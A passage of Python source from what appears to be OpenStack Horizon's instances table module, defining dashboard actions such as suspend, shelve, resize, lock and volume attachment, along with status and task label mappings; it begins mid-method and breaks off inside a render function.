        # Cached for action() to decide between suspend and resume.
        self.suspended = instance.status == "SUSPENDED"
        if self.suspended:
            self.current_present_action = RESUME
            # Fix: check the resume rule of the suspend-server policy,
            # not the unrelated "os-rescue" rule that was checked before.
            policy_rules = (
                ("compute", "os_compute_api:os-suspend-server:resume"),)
        else:
            self.current_present_action = SUSPEND
            policy_rules = (
                ("compute", "os_compute_api:os-suspend-server:suspend"),)
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission and
                (instance.status in ACTIVE_STATES or self.suspended) and
                not is_deleting(instance))
    def action(self, request, obj_id):
        if self.suspended:
            api.nova.server_resume(request, obj_id)
            self.current_past_action = RESUME
        else:
            api.nova.server_suspend(request, obj_id)
            self.current_past_action = SUSPEND
class ToggleShelve(tables.BatchAction):
    """Shelve an instance or unshelve a shelved-offloaded one.

    allowed() caches the current shelved state on ``self`` and selects the
    matching (present, past) label via current_present_action /
    current_past_action, which the BatchAction machinery reads.
    """
    name = "shelve"
    icon = "shelve"
    @staticmethod
    def action_present(count):
        # (shelve label, unshelve label) — indexed by SHELVE / UNSHELVE.
        return (
            ungettext_lazy(
                u"Shelve Instance",
                u"Shelve Instances",
                count
            ),
            ungettext_lazy(
                u"Unshelve Instance",
                u"Unshelve Instances",
                count
            ),
        )
    @staticmethod
    def action_past(count):
        return (
            ungettext_lazy(
                u"Shelved Instance",
                u"Shelved Instances",
                count
            ),
            ungettext_lazy(
                u"Unshelved Instance",
                u"Unshelved Instances",
                count
            ),
        )
    def allowed(self, request, instance=None):
        if not api.nova.extension_supported('Shelve', request):
            return False
        if not instance:
            return False
        # Locked instances may only be (un)shelved by an admin.
        if not request.user.is_superuser and getattr(
                instance, 'locked', False):
            return False
        # Cached for action() to decide between shelve and unshelve.
        self.shelved = instance.status == "SHELVED_OFFLOADED"
        if self.shelved:
            self.current_present_action = UNSHELVE
            policy_rules = (("compute", "os_compute_api:os-shelve:unshelve"),)
        else:
            self.current_present_action = SHELVE
            policy_rules = (("compute", "os_compute_api:os-shelve:shelve"),)
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission and
                (instance.status in SHELVE_READY_STATES or self.shelved) and
                not is_deleting(instance))
    def action(self, request, obj_id):
        if self.shelved:
            api.nova.server_unshelve(request, obj_id)
            self.current_past_action = UNSHELVE
        else:
            api.nova.server_shelve(request, obj_id)
            self.current_past_action = SHELVE
class LaunchLink(tables.LinkAction):
    """Link to the legacy (Django-based) Launch Instance workflow.

    The button is disabled (and its label annotated) when the project's
    instance, core, or RAM quota is exhausted.
    """
    name = "launch"
    verbose_name = _("Launch Instance")
    url = "horizon:project:instances:launch"
    classes = ("ajax-modal", "btn-launch")
    icon = "cloud-upload"
    policy_rules = (("compute", "os_compute_api:servers:create"),)
    ajax = True
    def __init__(self, attrs=None, **kwargs):
        kwargs['preempt'] = True
        super(LaunchLink, self).__init__(attrs, **kwargs)
    def allowed(self, request, datum):
        try:
            limits = api.nova.tenant_absolute_limits(request, reserved=True)
            instances_available = limits['maxTotalInstances'] \
                - limits['totalInstancesUsed']
            cores_available = limits['maxTotalCores'] \
                - limits['totalCoresUsed']
            ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
            if instances_available <= 0 or cores_available <= 0 \
                    or ram_available <= 0:
                if "disabled" not in self.classes:
                    self.classes = [c for c in self.classes] + ['disabled']
                    self.verbose_name = string_concat(self.verbose_name, ' ',
                                                      _("(Quota exceeded)"))
            else:
                self.verbose_name = _("Launch Instance")
                classes = [c for c in self.classes if c != "disabled"]
                self.classes = classes
        except Exception:
            LOG.exception("Failed to retrieve quota information")
            # If we can't get the quota information, leave it to the
            # API to check when launching
        return True  # The action should always be displayed
    def single(self, table, request, object_id=None):
        # Re-evaluate quota state before rendering via AJAX.
        self.allowed(request, None)
        return HttpResponse(self.render(is_table_action=True))
class LaunchLinkNG(LaunchLink):
    """Launch Instance button that opens the AngularJS launch wizard.

    The real navigation happens via the ng-click handler; the href is a
    no-op javascript URL.
    """
    name = "launch-ng"
    url = "horizon:project:instances:index"
    ajax = False
    classes = ("btn-launch", )
    def get_default_attrs(self):
        url = urls.reverse(self.url)
        ngclick = "modal.openLaunchInstanceWizard(" \
            "{ successUrl: '%s' })" % url
        self.attrs.update({
            'ng-controller': 'LaunchInstanceModalController as modal',
            'ng-click': ngclick
        })
        return super(LaunchLinkNG, self).get_default_attrs()
    def get_link_url(self, datum=None):
        return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the Update Instance workflow at the instance-info step."""
    name = "edit"
    verbose_name = _("Edit Instance")
    url = "horizon:project:instances:update"
    classes = ("ajax-modal",)
    icon = "pencil"
    policy_rules = (("compute", "os_compute_api:servers:update"),)
    def get_link_url(self, project):
        return self._get_link_url(project, 'instance_info')
    def _get_link_url(self, project, step_slug):
        # Build the workflow URL preselecting ``step_slug`` and carrying
        # the current table URL so the workflow can redirect back.
        base_url = urls.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        params = {"step": step_slug,
                  update_instance.UpdateInstance.redirect_param_name: next_url}
        param = urlencode(params)
        return "?".join([base_url, param])
    def allowed(self, request, instance):
        return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
    """Open the Update Instance workflow at the security-groups step."""
    name = "edit_secgroups"
    verbose_name = _("Edit Security Groups")
    def get_link_url(self, project):
        return self._get_link_url(project, 'update_security_groups')
    def allowed(self, request, instance=None):
        if not api.base.is_service_enabled(request, 'network'):
            return False
        # Only the owning project may edit its instance's security groups.
        return (instance.status in ACTIVE_STATES and
                not is_deleting(instance) and
                request.user.tenant_id == instance.tenant_id)
class EditPortSecurityGroups(tables.LinkAction):
    """Jump to the instance detail page, interfaces tab, to edit
    per-port security groups."""
    name = "edit_port_secgroups"
    verbose_name = _("Edit Port Security Groups")
    url = "horizon:project:instances:detail"
    icon = "pencil"
    def get_link_url(self, instance):
        base_url = urls.reverse(self.url, args=[instance.id])
        return '%s?tab=%s__%s' % (base_url, 'instance_details', 'interfaces')
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the modal to create an image snapshot of the instance."""
    name = "snapshot"
    verbose_name = _("Create Snapshot")
    url = "horizon:project:images:snapshots:create"
    classes = ("ajax-modal",)
    icon = "camera"
    policy_rules = (("compute", "os_compute_api:snapshot"),)
    def allowed(self, request, instance=None):
        return instance.status in SNAPSHOT_READY_STATES \
            and not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Link to the instance's console tab on the detail page."""
    name = "console"
    verbose_name = _("Console")
    url = "horizon:project:instances:detail"
    classes = ("btn-console",)
    policy_rules = (("compute", "os_compute_api:os-consoles:index"),)
    def allowed(self, request, instance=None):
        # We check if ConsoleLink is allowed only if settings.CONSOLE_TYPE is
        # not set at all, or if it's set to any value other than None or False.
        return bool(getattr(settings, 'CONSOLE_TYPE', True)) and \
            instance.status in ACTIVE_STATES and not is_deleting(instance)
    def get_link_url(self, datum):
        base_url = super(ConsoleLink, self).get_link_url(datum)
        tab_query_string = tabs.ConsoleTab(
            tabs.InstanceDetailTabs).get_query_string()
        return "?".join([base_url, tab_query_string])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Link to the instance's console-log tab on the detail page."""
    name = "log"
    verbose_name = _("View Log")
    url = "horizon:project:instances:detail"
    classes = ("btn-log",)
    policy_rules = (("compute", "os_compute_api:os-console-output"),)
    def allowed(self, request, instance=None):
        return instance.status in ACTIVE_STATES and not is_deleting(instance)
    def get_link_url(self, datum):
        base_url = super(LogLink, self).get_link_url(datum)
        tab_query_string = tabs.LogTab(
            tabs.InstanceDetailTabs).get_query_string()
        return "?".join([base_url, tab_query_string])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the Resize Instance workflow at the flavor-choice step."""
    name = "resize"
    verbose_name = _("Resize Instance")
    url = "horizon:project:instances:resize"
    classes = ("ajax-modal", "btn-resize")
    policy_rules = (("compute", "os_compute_api:servers:resize"),)
    action_type = "danger"
    def get_link_url(self, project):
        return self._get_link_url(project, 'flavor_choice')
    def _get_link_url(self, project, step_slug):
        # Build the workflow URL preselecting ``step_slug`` and carrying
        # the current table URL so the workflow can redirect back.
        base_url = urls.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        params = {"step": step_slug,
                  resize_instance.ResizeInstance.redirect_param_name: next_url}
        param = urlencode(params)
        return "?".join([base_url, param])
    def allowed(self, request, instance):
        return ((instance.status in ACTIVE_STATES or
                 instance.status == 'SHUTOFF') and
                not is_deleting(instance))
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
    """Confirm a pending resize/migration (VERIFY_RESIZE state only)."""
    name = "confirm"
    verbose_name = _("Confirm Resize/Migrate")
    classes = ("btn-confirm", "btn-action-required")
    policy_rules = (("compute", "os_compute_api:servers:confirm_resize"),)
    def allowed(self, request, instance):
        return instance.status == 'VERIFY_RESIZE'
    def single(self, table, request, instance):
        api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
    """Revert a pending resize/migration (VERIFY_RESIZE state only)."""
    name = "revert"
    verbose_name = _("Revert Resize/Migrate")
    classes = ("btn-revert", "btn-action-required")
    policy_rules = (("compute", "os_compute_api:servers:revert_resize"),)
    def allowed(self, request, instance):
        return instance.status == 'VERIFY_RESIZE'
    def single(self, table, request, instance):
        api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the modal to rebuild an instance from a (new) image."""
    name = "rebuild"
    verbose_name = _("Rebuild Instance")
    classes = ("btn-rebuild", "ajax-modal")
    url = "horizon:project:instances:rebuild"
    policy_rules = (("compute", "os_compute_api:servers:rebuild"),)
    action_type = "danger"
    def allowed(self, request, instance):
        return ((instance.status in ACTIVE_STATES or
                 instance.status == 'SHUTOFF') and
                not is_deleting(instance))
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urls.reverse(self.url, args=[instance_id])
class DecryptInstancePassword(tables.LinkAction):
    """Open the modal to decrypt the instance's admin password with the
    instance's key pair (opt-in via OPENSTACK_ENABLE_PASSWORD_RETRIEVE)."""
    name = "decryptpassword"
    verbose_name = _("Retrieve Password")
    classes = ("btn-decrypt", "ajax-modal")
    url = "horizon:project:instances:decryptpassword"
    def allowed(self, request, instance):
        enable = getattr(settings,
                         'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
                         False)
        # NOTE(review): get_keyname() returns a translated "Not available"
        # string rather than None when no key pair exists — the final
        # check presumably never fires; verify against get_keyname.
        return (enable and
                (instance.status in ACTIVE_STATES or
                 instance.status == 'SHUTOFF') and
                not is_deleting(instance) and
                get_keyname(instance) is not None)
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        keypair_name = get_keyname(datum)
        return urls.reverse(self.url, args=[instance_id,
                                            keypair_name])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the floating-IP association workflow for this instance."""
    name = "associate"
    verbose_name = _("Associate Floating IP")
    url = "horizon:project:floating_ips:associate"
    classes = ("ajax-modal",)
    icon = "link"
    policy_rules = (("network", "update_floatingip"),)
    def allowed(self, request, instance):
        if not api.base.is_service_enabled(request, 'network'):
            return False
        if not api.neutron.floating_ip_supported(request):
            return False
        # When simple-associate is supported, a different UI path is used.
        if api.neutron.floating_ip_simple_associate_supported(request):
            return False
        if instance.status == "ERROR":
            return False
        # Hide the action if the instance already has a floating IP.
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "floating":
                    return False
        return not is_deleting(instance)
    def get_link_url(self, datum):
        base_url = urls.reverse(self.url)
        next_url = self.table.get_full_url()
        params = {
            "instance_id": self.table.get_object_id(datum),
            workflows.IPAssociationWorkflow.redirect_param_name: next_url}
        params = urlencode(params)
        return "?".join([base_url, params])
class DisassociateIP(tables.LinkAction):
    """Open the modal to disassociate a floating IP from this instance."""
    name = "disassociate"
    verbose_name = _("Disassociate Floating IP")
    url = "horizon:project:instances:disassociate"
    classes = ("btn-disassociate", 'ajax-modal')
    policy_rules = (("network", "update_floatingip"),)
    action_type = "danger"
    def allowed(self, request, instance):
        if not api.base.is_service_enabled(request, 'network'):
            return False
        if not api.neutron.floating_ip_supported(request):
            return False
        # Only offered when the instance actually has a floating IP.
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "floating":
                    return not is_deleting(instance)
        return False
class UpdateMetadata(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the Angular metadata-editor modal for the instance; the
    navigation happens through the ng-click handler, not the href."""
    name = "update_metadata"
    verbose_name = _("Update Metadata")
    ajax = False
    icon = "pencil"
    attrs = {"ng-controller": "MetadataModalHelperController as modal"}
    policy_rules = (("compute", "os_compute_api:server-metadata:update"),)
    def __init__(self, attrs=None, **kwargs):
        kwargs['preempt'] = True
        super(UpdateMetadata, self).__init__(attrs, **kwargs)
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        self.attrs['ng-click'] = (
            "modal.openMetadataModal('instance', '%s', true, 'metadata')"
            % instance_id)
        return "javascript:void(0);"
    def allowed(self, request, instance=None):
        return (instance and
                instance.status.lower() != 'error')
def instance_fault_to_friendly_message(instance):
    """Translate a raw nova fault on *instance* into a user-facing message.

    Known fault messages get a tailored explanation; anything else falls
    back to a generic "try again later" message embedding the raw text.
    """
    raw_message = getattr(instance, 'fault', {}).get('message', _("Unknown"))
    friendly = {
        'NoValidHost': _("There is not enough capacity for this "
                         "flavor in the selected availability zone. "
                         "Try again later or select a different availability "
                         "zone."),
    }
    fallback = _("Please try again later [Error: %s].") % raw_message
    return friendly.get(raw_message, fallback)
def get_instance_error(instance):
    """Return a translated error message for an ERROR'd instance.

    :param instance: nova server object
    :returns: lazily-concatenated message string, or None when the
        instance is not in the error state
    """
    if instance.status.lower() != 'error':
        return None
    message = instance_fault_to_friendly_message(instance)
    # Fix operator precedence: the original ``% instance.name or
    # instance.id`` parsed as ``(template % name) or id``, so the id
    # fallback for unnamed instances was never used.
    preamble = _('Failed to perform requested operation on instance "%s", the '
                 'instance has an error status') % (instance.name or
                                                    instance.id)
    message = string_concat(preamble, ': ', message)
    return message
class UpdateRow(tables.Row):
    """AJAX row updater: refetches one instance and enriches it with
    flavor and address information; surfaces error status to the user."""
    ajax = True
    def get_data(self, request, instance_id):
        instance = api.nova.server_get(request, instance_id)
        try:
            instance.full_flavor = api.nova.flavor_get(request,
                                                       instance.flavor["id"])
        except Exception:
            # Best-effort: the row still renders without flavor details.
            exceptions.handle(request,
                              _('Unable to retrieve flavor information '
                                'for instance "%s".') % instance_id,
                              ignore=True)
        try:
            api.network.servers_update_addresses(request, [instance])
        except Exception:
            # Best-effort: the row still renders without address details.
            exceptions.handle(request,
                              _('Unable to retrieve Network information '
                                'for instance "%s".') % instance_id,
                              ignore=True)
        error = get_instance_error(instance)
        if error:
            messages.error(request, error)
        return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Start (power on) stopped instances."""
    name = "start"
    classes = ('btn-confirm',)
    policy_rules = (("compute", "os_compute_api:servers:start"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Start Instance",
            u"Start Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Started Instance",
            u"Started Instances",
            count
        )
    def allowed(self, request, instance):
        return ((instance is None) or
                (instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")))
    def action(self, request, obj_id):
        api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Shut off running (or suspended) instances."""
    name = "stop"
    policy_rules = (("compute", "os_compute_api:servers:stop"),)
    help_text = _("The instance(s) will be shut off.")
    action_type = "danger"
    @staticmethod
    def action_present(count):
        return npgettext_lazy(
            "Action to perform (the instance is currently running)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return npgettext_lazy(
            "Past action (the instance is currently already Shut Off)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )
    def allowed(self, request, instance):
        # Based on the power state rather than the API status.
        return (instance is None or
                (get_power_state(instance) in ("RUNNING", "SUSPENDED") and
                 not is_deleting(instance)))
    def action(self, request, obj_id):
        api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Lock instances to protect them from accidental operations."""
    name = "lock"
    policy_rules = (("compute", "os_compute_api:os-lock-server:lock"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Lock Instance",
            u"Lock Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Locked Instance",
            u"Locked Instances",
            count
        )
    # to only allow unlocked instances to be locked
    def allowed(self, request, instance):
        if getattr(instance, 'locked', False):
            return False
        if not api.nova.extension_supported('AdminActions', request):
            return False
        if not api.nova.is_feature_available(request, "locked_attribute"):
            return False
        return True
    def action(self, request, obj_id):
        api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Unlock previously locked instances."""
    name = "unlock"
    policy_rules = (("compute", "os_compute_api:os-lock-server:unlock"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Unlock Instance",
            u"Unlock Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Unlocked Instance",
            u"Unlocked Instances",
            count
        )
    # to only allow locked instances to be unlocked
    def allowed(self, request, instance):
        # Note the inverse default vs LockInstance: missing attribute is
        # treated as locked here so the action stays hidden when unknown.
        if not getattr(instance, 'locked', True):
            return False
        if not api.nova.extension_supported('AdminActions', request):
            return False
        if not api.nova.is_feature_available(request, "locked_attribute"):
            return False
        return True
    def action(self, request, obj_id):
        api.nova.server_unlock(request, obj_id)
class AttachVolume(tables.LinkAction):
    """Open the modal to attach a cinder volume to this instance."""
    name = "attach_volume"
    verbose_name = _("Attach Volume")
    url = "horizon:project:instances:attach_volume"
    classes = ("ajax-modal",)
    policy_rules = (
        ("compute", "os_compute_api:os-volumes-attachments:create"),)
    # This action should be disabled if the instance
    # is not active, or the instance is being deleted
    # or cinder is not enabled
    def allowed(self, request, instance=None):
        # Fix: ("ACTIVE") is just the string "ACTIVE", so the original
        # test was a substring check; use a real one-element tuple.
        return (instance.status in ("ACTIVE",) and
                not is_deleting(instance) and
                api.cinder.is_volume_service_enabled(request))
class DetachVolume(AttachVolume):
    """Open the modal to detach a cinder volume from this instance."""
    name = "detach_volume"
    verbose_name = _("Detach Volume")
    url = "horizon:project:instances:detach_volume"
    policy_rules = (
        ("compute", "os_compute_api:os-volumes-attachments:delete"),)
    # This action should be disabled if the instance
    # is not active, or the instance is being deleted
    # or cinder is not enabled
    def allowed(self, request, instance=None):
        # Fix: ("ACTIVE") is just the string "ACTIVE", so the original
        # test was a substring check; use a real one-element tuple.
        return (instance.status in ("ACTIVE",) and
                not is_deleting(instance) and
                api.cinder.is_volume_service_enabled(request))
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the modal to attach a network interface to the instance."""
    name = "attach_interface"
    verbose_name = _("Attach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:attach_interface"
    policy_rules = (("compute", "os_compute_api:os-attach-interfaces"),)
    def allowed(self, request, instance):
        return ((instance.status in ACTIVE_STATES or
                 instance.status == 'SHUTOFF') and
                not is_deleting(instance) and
                api.base.is_service_enabled(request, 'network'))
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urls.reverse(self.url, args=[instance_id])
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the modal to detach a network interface from the instance."""
    name = "detach_interface"
    verbose_name = _("Detach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:detach_interface"
    policy_rules = (("compute", "os_compute_api:os-attach-interfaces:delete"),)
    def allowed(self, request, instance):
        if not api.base.is_service_enabled(request, 'network'):
            return False
        if is_deleting(instance):
            return False
        if (instance.status not in ACTIVE_STATES and
                instance.status != 'SHUTOFF'):
            return False
        # Only offered when the instance has at least one fixed address.
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "fixed":
                    return True
        return False
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urls.reverse(self.url, args=[instance_id])
def get_ips(instance):
    """Render the instance's addresses, grouped by network, as HTML.

    Within each group the addresses are sorted by IP version so IPv4
    entries appear before IPv6 ones.
    """
    template_name = 'project/instances/_instance_ips.html'
    ip_groups = {}
    for ip_group, addresses in instance.addresses.items():
        ips = [addr['addr'] for addr in addresses]
        ips.sort(key=lambda ip: netaddr.IPAddress(ip).version)
        ip_groups[ip_group] = ips
    context = {
        "ip_groups": ip_groups,
    }
    return template.loader.render_to_string(template_name, context)
def get_flavor(instance):
    """Render the instance's flavor details as HTML.

    Requires ``instance.full_flavor`` (populated e.g. by UpdateRow);
    otherwise a translated "Not available" string is returned.
    """
    if hasattr(instance, "full_flavor"):
        template_name = 'project/instances/_instance_flavor.html'
        size_ram = sizeformat.mb_float_format(instance.full_flavor.ram)
        if instance.full_flavor.disk > 0:
            size_disk = sizeformat.diskgbformat(instance.full_flavor.disk)
        else:
            size_disk = _("%s GB") % "0"
        context = {
            "name": instance.full_flavor.name,
            "id": instance.id,
            "size_disk": size_disk,
            "size_ram": size_ram,
            "vcpus": instance.full_flavor.vcpus,
            "flavor_id": instance.full_flavor.id
        }
        return template.loader.render_to_string(template_name, context)
    return _("Not available")
def get_keyname(instance):
    """Return the instance's key pair name, or a translated fallback
    when the attribute is absent."""
    try:
        return instance.key_name
    except AttributeError:
        return _("Not available")
def get_power_state(instance):
    """Map the instance's numeric power-state code to its display name,
    defaulting to code 0 ("NO STATE") and '' for unknown codes."""
    code = getattr(instance, "OS-EXT-STS:power_state", 0)
    return POWER_STATES.get(code, '')
# (raw status value, translated label) pairs for the Status table column.
STATUS_DISPLAY_CHOICES = (
    ("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
    ("active", pgettext_lazy("Current status of an Instance", u"Active")),
    ("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
    ("suspended", pgettext_lazy("Current status of an Instance",
                                u"Suspended")),
    ("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
    ("error", pgettext_lazy("Current status of an Instance", u"Error")),
    ("resize", pgettext_lazy("Current status of an Instance",
                             u"Resize/Migrate")),
    ("verify_resize", pgettext_lazy("Current status of an Instance",
                                    u"Confirm or Revert Resize/Migrate")),
    ("revert_resize", pgettext_lazy(
        "Current status of an Instance", u"Revert Resize/Migrate")),
    ("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
    ("hard_reboot", pgettext_lazy("Current status of an Instance",
                                  u"Hard Reboot")),
    ("password", pgettext_lazy("Current status of an Instance", u"Password")),
    ("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
    ("migrating", pgettext_lazy("Current status of an Instance",
                                u"Migrating")),
    ("build", pgettext_lazy("Current status of an Instance", u"Build")),
    ("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
    ("soft-delete", pgettext_lazy("Current status of an Instance",
                                  u"Soft Deleted")),
    ("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
    ("shelved_offloaded", pgettext_lazy("Current status of an Instance",
                                        u"Shelved Offloaded")),
    # these vm states are used when generating CSV usage summary
    ("building", pgettext_lazy("Current status of an Instance", u"Building")),
    ("stopped", pgettext_lazy("Current status of an Instance", u"Stopped")),
    ("rescued", pgettext_lazy("Current status of an Instance", u"Rescued")),
    ("resized", pgettext_lazy("Current status of an Instance", u"Resized")),
)
# Label shown in the Task column when no task state is set.
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
TASK_DISPLAY_CHOICES = (
    ("scheduling", pgettext_lazy("Task status of an Instance",
                                 u"Scheduling")),
    ("block_device_mapping", pgettext_lazy("Task status of an Instance",
                                           u"Block Device Mapping")),
    ("networking", pgettext_lazy("Task status of an Instance",
                                 u"Networking")),
    ("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
    ("image_snapshot", pgettext_lazy("Task status of an Instance",
                                     u"Snapshotting")),
    ("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
                                             u"Image Snapshot Pending")),
    ("image_pending_upload", pgettext_lazy("Task status of an Instance",
                                           u"Image Pending Upload")),
    ("image_uploading", pgettext_lazy("Task status of an Instance",
                                      u"Image Uploading")),
    ("image_backup", pgettext_lazy("Task status of an Instance",
                                   u"Image Backup")),
    ("updating_password", pgettext_lazy("Task status of an Instance",
                                        u"Updating Password")),
    ("resize_prep", pgettext_lazy("Task status of an Instance",
                                  u"Preparing Resize or Migrate")),
    ("resize_migrating", pgettext_lazy("Task status of an Instance",
                                       u"Resizing or Migrating")),
    ("resize_migrated", pgettext_lazy("Task status of an Instance",
                                      u"Resized or Migrated")),
    ("resize_finish", pgettext_lazy("Task status of an Instance",
                                    u"Finishing Resize or Migrate")),
    ("resize_reverting", pgettext_lazy("Task status of an Instance",
                                       u"Reverting Resize or Migrate")),
    ("resize_confirming", pgettext_lazy("Task status of an Instance",
                                        u"Confirming Resize or Migrate")),
    ("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
    ("reboot_pending", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Pending")),
    ("reboot_started", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Started")),
    ("rebooting_hard", pgettext_lazy("Task status of an Instance",
                                     u"Hard Rebooting")),
    ("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
                                          u"Hard Reboot Pending")),
    ("reboot_started_hard", pgettext_lazy("Task status of an Instance",
                                          u"Hard Reboot Started")),
    ("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
    ("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("suspending", pgettext_lazy("Task status of an Instance",
                                 u"Suspending")),
    ("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("powering-off", pgettext_lazy("Task status of an Instance",
                                   u"Powering Off")),
    ("powering-on", pgettext_lazy("Task status of an Instance",
                                  u"Powering On")),
    ("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
    ("unrescuing", pgettext_lazy("Task status of an Instance",
                                 u"Unrescuing")),
    ("rebuilding", pgettext_lazy("Task status of an Instance",
                                 u"Rebuilding")),
    ("rebuild_block_device_mapping", pgettext_lazy(
        "Task status of an Instance", u"Rebuild Block Device Mapping")),
    ("rebuild_spawning", pgettext_lazy("Task status of an Instance",
                                       u"Rebuild Spawning")),
    ("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
    ("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
    ("soft-deleting", pgettext_lazy("Task status of an Instance",
                                    u"Soft Deleting")),
    ("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
    ("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
    ("shelving_image_pending_upload", pgettext_lazy(
        "Task status of an Instance", u"Shelving Image Pending Upload")),
    ("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
                                               u"Shelving Image Uploading")),
    ("shelving_offloading", pgettext_lazy("Task status of an Instance",
                                          u"Shelving Offloading")),
    ("unshelving", pgettext_lazy("Task status of an Instance",
                                 u"Unshelving")),
)
# (POWER_STATES name, translated label) pairs for the power-state column.
POWER_DISPLAY_CHOICES = (
    ("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
    ("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
    ("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
    ("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
    ("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
    ("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
    ("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
    ("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
    ("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
    ("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
# Server-side filter fields offered by InstancesFilterAction; each entry
# is (field, label, api_filterable[, help_text[, enabled]]).
INSTANCE_FILTER_CHOICES = (
    ('uuid', _("Instance ID ="), True),
    ('name', _("Instance Name ="), True),
    ('image', _("Image ID ="), True),
    ('image_name', _("Image Name ="), True),
    ('ip', _("IPv4 Address ="), True),
    ('ip6', _("IPv6 Address ="), True, None,
     api.neutron.is_enabled_by_config('enable_ipv6')),
    ('flavor', _("Flavor ID ="), True),
    ('flavor_name', _("Flavor Name ="), True),
    ('key_name', _("Key Pair Name ="), True),
    ('status', _("Status ="), True),
    ('availability_zone', _("Availability Zone ="), True),
    ('changes-since', _("Changes Since"), True,
     _("Filter by an ISO 8061 formatted time, e.g. 2016-06-14T06:27:59Z")),
    ('vcpus', _("vCPUs ="), True),
)
class InstancesFilterAction(tables.FilterAction):
    """Filter action for the instances table.

    filter_type "server" makes Horizon send the chosen filter to the API
    instead of filtering already-fetched rows in the browser.
    """
    filter_type = "server"
    filter_choices = INSTANCE_FILTER_CHOICES
def render_locked(instance):
    """Render the lock-state icon (with tooltip) for an instance row.

    Returns "" when the instance object carries no ``locked`` attribute,
    otherwise a ``mark_safe``'d <span> with the appropriate FontAwesome
    icon classes and translated tooltip text.
    """
    # Instances fetched through older APIs may lack the attribute entirely.
